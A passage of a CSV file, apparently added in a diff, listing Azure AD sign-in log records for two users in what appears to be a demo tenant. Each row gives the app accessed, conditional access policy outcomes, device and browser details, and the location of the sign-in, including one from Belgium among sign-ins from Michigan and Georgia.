'2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:22,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",325d7c9c-ae51-4f5f-a5f7-8aa4b2e11000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,325d7c9c-ae51-4f5f-a5f7-8aa4b2e11000,SigninLogs,Sucess,41.90428925,-85.99833679
+2115,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:18.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c0227c3-bf8d-4935-9749-62fa7fb762c6,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:22,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",325d7c9c-ae51-4f5f-a5f7-8aa4c4e11000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,325d7c9c-ae51-4f5f-a5f7-8aa4c4e11000,SigninLogs,Sucess,41.90428925,-85.99833679
+2116,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:53.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f9037016-a42c-48cf-9ce5-375accb1cf67,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",9303d935-cf24-489a-bd00-a11cbe4d1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,9303d935-cf24-489a-bd00-a11cbe4d1200,SigninLogs,Sucess,33.7984581,-84.38828278
+2117,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:09.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8bbf24ff-5ca2-46a0-9994-4313ee584c7e,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",e555e9d8-8e19-4918-91cf-fdbcf8741200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,e555e9d8-8e19-4918-91cf-fdbcf8741200,SigninLogs,Sucess,41.90428925,-85.99833679
+2118,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:51.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f6ed10a4-126f-4cd1-a4d8-daf4dd166a49,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:20,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",3b0e5c51-5aba-4adb-89c0-6eab4e9f1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3b0e5c51-5aba-4adb-89c0-6eab4e9f1200,SigninLogs,Sucess,41.90428925,-85.99833679
+2119,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:31.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5d9c265a-69fb-440e-9b79-89deb06b986b,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:22,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",24b904d7-063a-4f4c-9637-40c717ed1200,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,24b904d7-063a-4f4c-9637-40c717ed1200,SigninLogs,Sucess,50.6406517,5.572050095
+2120,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:16.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b426ac10-9375-40d4-a2ee-070a9d7b9b4f,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:22,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c8ea9bc1-b11e-4423-93a8-17c094231200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,c8ea9bc1-b11e-4423-93a8-17c094231200,SigninLogs,Sucess,41.90428925,-85.99833679
+2121,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:50.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5eddc168-2faf-4cdd-8616-aec3184c9839,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",fbcf3a57-b92a-4bcf-a38d-09fbb6271200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,fbcf3a57-b92a-4bcf-a38d-09fbb6271200,SigninLogs,Sucess,33.7984581,-84.38828278
+2122,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:18.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9537efd8-b070-4167-beaa-489157b86584,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",23bcff85-732c-47fa-be9f-91d3ff6e1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,23bcff85-732c-47fa-be9f-91d3ff6e1200,SigninLogs,Sucess,33.7984581,-84.38828278
